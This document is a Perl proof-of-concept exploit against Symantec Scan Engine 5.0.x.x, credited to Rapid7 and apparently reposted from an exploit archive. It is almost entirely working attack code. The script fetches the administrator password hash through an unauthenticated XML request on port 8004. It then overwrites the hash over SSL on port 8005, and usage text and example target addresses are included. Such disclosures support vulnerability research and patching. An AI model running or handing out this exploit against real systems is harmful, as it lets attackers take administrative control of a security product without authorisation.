Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit

=================================================================
Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit
=================================================================

#!/usr/bin/perl -w
#
# Remotely change the administrator password (or password hash) of
# Symantec Scan Engine.
#
# Author: Marc Bevand of Rapid7 <marc_bevand(at)rapid7.com>
# Copyright 2006 Rapid7, LLC. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
#   1. Redistributions of source code must retain the above copyright
#   notice, this list of conditions and the following disclaimer.
#
#   2. Redistributions in binary form must reproduce the above
#   copyright notice, this list of conditions and the following
#   disclaimer in the documentation and/or other materials provided
#   with the distribution.
#
#   THIS SOFTWARE IS PROVIDED BY RAPID7, LLC ``AS IS'' AND ANY EXPRESS
#   OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#   WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
#   ARE DISCLAIMED. IN NO EVENT SHALL RAPID7, LLC BE LIABLE FOR ANY
#   DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
#   DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
#   GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
#   INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
#   WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
#   NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
#   SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#

use strict;
use Getopt::Long;
use LWP::UserAgent;
use Digest::MD5 qw/md5_hex/;
use Net::SSLeay::Handle qw/shutdown/;

#
# Init LWP::UserAgent (the user agent string is the one currently used
# by the Scan Engine java applet).
#
sub init {
  my $ua;
  $ua = LWP::UserAgent->new(keep_alive => 0);
  $ua->agent("Mozilla/4.0 (Windows 2000 5.0) Java/1.4.2_08");
  return $ua;
}

#
# Example of service string to be parsed:
# 10.68.4.4
# 10.68.4.4/8004/8005
# hostname
# hostname/9004/9005
#
sub parse_service {
  my ($service) = @_;

  if ($service =~ m{^([^/]*)/(\d+)/(\d+)$}) {
     return $1, $2, $3;
  } elsif ($service =~ m{^([^/]*)$}) {
     return $1, 8004, 8005;
  } else {
     die "cannot parse service: $service";
  }
}

#
# Sends a request to obtain the password hash. Note: the RSA key
# (modulus and public exponent) has been randomly chosen.
#
sub data_to_send {
  my $r1 =
  '<request><key mod="784607708866372110095636553206565253692059085'.
  '0882661452379500719255245078226751123858547991180612629396444366'.
  '109364669329014831409765373165312900564995261" pub="754297542068'.
  '3822223796790522532950961415568940207500046396606172395479254814'.
  '3383744922039888710333203519260280729415961892539564611703079983'.
  '74406014351745">I need the key</key></request>'
  ;

  return $r1;
}

#
# Example of response to be parsed:
# <request>
#   <message xmlns:xs="http://www.w3.org/2001/XMLSchema"
#     xmlns:java="class:com.symantec.common.SimpleRSA"
#     value="01234567890123456789012345678901234567890123456789012345\
# 6789"/>
#   <password xmlns:xs="http://www.w3.org/2001/XMLSchema"
#     xmlns:java="class:com.symantec.common.SimpleRSA"
#     pass="86B7A1FE120C0279971559B6BAC8C5713EF580BAFD20168D622B7E170\
# D248642"/>
# </request>
#
sub parse_resp {
  my ($res) = @_;

  if ($res =~ /pass="([[:xdigit:]]{64})"/) {
     return $1;
  } else {
     die "cannot parse response: $res";
  }
}

#
# Return a password hash.
#
sub hash_passwd {
  my ($pwd) = @_;
  my $salt = sprintf "%08X%08X%08X%08X", rand(0xffffffff),
  rand(0xffffffff), rand(0xffffffff), rand(0xffffffff);

  return uc(md5_hex("$pwd$salt")) . $salt;
}

sub send_request {
  my ($socket, $req) = @_;

  $req = pack("n", length($req)).$req;
  print $socket $req;
}

#
# Set the administrator password hash.
#
sub set_hash {
  my ($hostname, $port_ssl, $hash) = @_;
  my $socket;
  my $reply;

  tie(*SSL, "Net::SSLeay::Handle", $hostname, $port_ssl)
     or die "ssl tie: $!";
  $socket = \*SSL;
  send_request($socket,
     '<request command="submit" parms="apply" type="saveapply">'.
     '<![CDATA[<?xml version="1.0" encoding="UTF-8"?>'.
     '<guichanges><configuration>'.
     '<changes xpath="//admin/password/@value" value="'.$hash.'"/>'.
     '</configuration></guichanges>'.
     ']]></request>');
  send_request($socket,
     'UTFWritesDone');
  shutdown($socket, 1) or die "ssl shutdown: $!";
  $reply = substr(<$socket>, 2);
  $reply = substr($reply, 0, index($reply, 'UTFWritesDone') - 2);
  if ($reply !~ m{<message status='apply_success'>Apply!</message>})
  {
     die "command failed: $reply";
  }
  close($socket) or die "ssl close: $!";
}

sub doit {
  my ($service, $pwd, $hash) = @_;
  my $hostname;
  my $port_http;
  my $port_ssl;
  my $ua;
  my $url;
  my $req;
  my $res;
  my $old_hash;

  ($hostname, $port_http, $port_ssl) = parse_service($service);
  $ua = init();
  $url = "http://$hostname:$port_http/xml.xml";
  $req = HTTP::Request->new(POST => $url);
  $req->content_type('application/x-www-form-urlencoded');
  $req->content(data_to_send());
  $res = $ua->request($req);
  $res->is_success or die "got ".$res->status_line." for $url\n";
  ($old_hash) = parse_resp($res->content);
  print "Old hash: $old_hash\n";
  if ($hash) {
     set_hash($hostname, $port_ssl, $hash);
     print "New hash: $hash\n";
  } else {
     $hash = hash_passwd($pwd);
     set_hash($hostname, $port_ssl, $hash);
     print "New hash: $hash\n";
     print "Password successfully set to: '$pwd'\n";
  }
}

sub error {
  print STDERR "Try `$0 --help' for more information.\n";
}

sub usage {
  print "Usage:\n".
  "  $0 [OPTIONS] <hostname>\n".
  "  $0 [OPTIONS] <hostname>/<http_port>/<ssl_port>\n".
  "Options:\n".
  "  --help                Display this help\n".
  "  --pwd <passwd>        Set the password (default: test)\n".
  "  --hash <passwd_hash>  Set the password hash instead of a parti".
  "cular password\n".
  "Examples:\n".
  "  $0 10.68.4.4\n".
  "  $0 --pwd foobar 10.68.4.4/8004/8005\n".
  "";
}

sub main {
  my $help;
  my $pwd = "test";
  my $hash;
  my $service;

  if (!GetOptions(
        "help" => \$help,
        "pwd=s" => \$pwd,
        "hash=s" => \$hash,
     )) {
     error(); exit(1);
  }
  if ($help) {
     usage(); exit(0);
  }
  if (!scalar(@ARGV)) {
     print STDERR "No service specified.\n";
     error(); exit(1);
  } elsif (1 == scalar(@ARGV)) {
     $service = $ARGV[0];
  } else {
     print STDERR "Extra argument: $ARGV[1]\n";
     error(); exit(1);
  }
  doit($service, $pwd, $hash);
}

main();

#
# END proof of concept
#


#  0day.today [2018-03-02]  #